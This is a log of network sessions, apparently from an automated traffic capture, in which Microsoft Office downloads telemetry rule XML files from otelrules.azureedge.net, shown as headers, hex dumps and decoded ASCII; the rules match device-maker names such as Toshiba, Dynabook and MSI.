                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          47192.168.2.44981313.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:38 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:38 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 486
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                          ETag: "0x8DC582B92FCB436"
                                                                                                                          x-ms-request-id: b8f0ecbf-701e-005c-16e0-1abb94000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162138Z-17db6f7c8cfnqpbkckdefmqa44000000055g000000006axb
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:38 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          48192.168.2.44980913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:38 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:38 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 494
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                          ETag: "0x8DC582BB8972972"
                                                                                                                          x-ms-request-id: 1507c9f1-d01e-007a-72eb-1af38c000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162138Z-17db6f7c8cf4g2pjavqhm24vp4000000059g00000000ap2q
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:38 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          49192.168.2.44981013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:38 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:38 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 420
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                          ETag: "0x8DC582B9DAE3EC0"
                                                                                                                          x-ms-request-id: a0484e99-b01e-00ab-3354-1cdafd000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162138Z-17db6f7c8cfjxfnba42c5rukwg000000025g0000000044zk
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:38 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          50192.168.2.44981113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:38 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:38 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:38 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 472
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                          ETag: "0x8DC582B9D43097E"
                                                                                                                          x-ms-request-id: 30f6abec-501e-005b-072b-1ad7f7000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162138Z-17db6f7c8cfhzb2znbk0zyvf6n00000004tg00000000anf0
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:38 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          51192.168.2.44981913.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 400
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                          ETag: "0x8DC582BB2D62837"
                                                                                                                          x-ms-request-id: e9bc8845-c01e-008d-06d9-1a2eec000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cfwtn5x6ye8p8q9m000000003ng00000000cya3
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:39 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          52192.168.2.44981713.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 404
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                          ETag: "0x8DC582B95C61A3C"
                                                                                                                          x-ms-request-id: 421ec19d-901e-002a-55e6-1c7a27000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cf6f7vv3recfp4a6w000000026g00000000804r
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:39 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          53192.168.2.44981513.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 423
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                          ETag: "0x8DC582BB7564CE8"
                                                                                                                          x-ms-request-id: f4abfb5c-001e-00a2-33e5-1ad4d5000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cf5mtxmr1c51513n0000000057000000000f38a
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:39 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          54192.168.2.44981613.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 478
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                                                                          ETag: "0x8DC582B9B233827"
                                                                                                                          x-ms-request-id: fbd0b5f8-a01e-0053-6218-1c8603000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cfcrfgzd01a8emnyg00000002kg00000000dr0w
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:39 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          55192.168.2.44981813.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:39 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 468
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                                                                          ETag: "0x8DC582BB046B576"
                                                                                                                          x-ms-request-id: aa8fb35a-601e-003d-30cd-1a6f25000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cf4g2pjavqhm24vp400000005dg000000002xa8
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:39 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          56192.168.2.44982013.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:39 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 479
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                          ETag: "0x8DC582BB7D702D0"
                                                                                                                          x-ms-request-id: 5aec4ebb-b01e-0002-57ca-1a1b8f000000
                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                          x-azure-ref: 20241013T162139Z-17db6f7c8cfspvtq2pgqb2w5k000000005400000000002sa
                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                          X-Cache: TCP_HIT
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          2024-10-13 16:21:40 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          57192.168.2.44982113.107.246.60443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-10-13 16:21:39 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept-Encoding: gzip
                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                          2024-10-13 16:21:40 UTC470INHTTP/1.1 200 OK
                                                                                                                          Date: Sun, 13 Oct 2024 16:21:40 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 475
                                                                                                                          Connection: close
                                                                                                                          Cache-Control: public, max-age=604800, immutable
                                                                                                                          Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                                                                          ETag: "0x8DC582BB2BE84FD"
                                                                                                                          x-ms-request-id: b2260943-f01e-0052-0b1c-1c9224000000
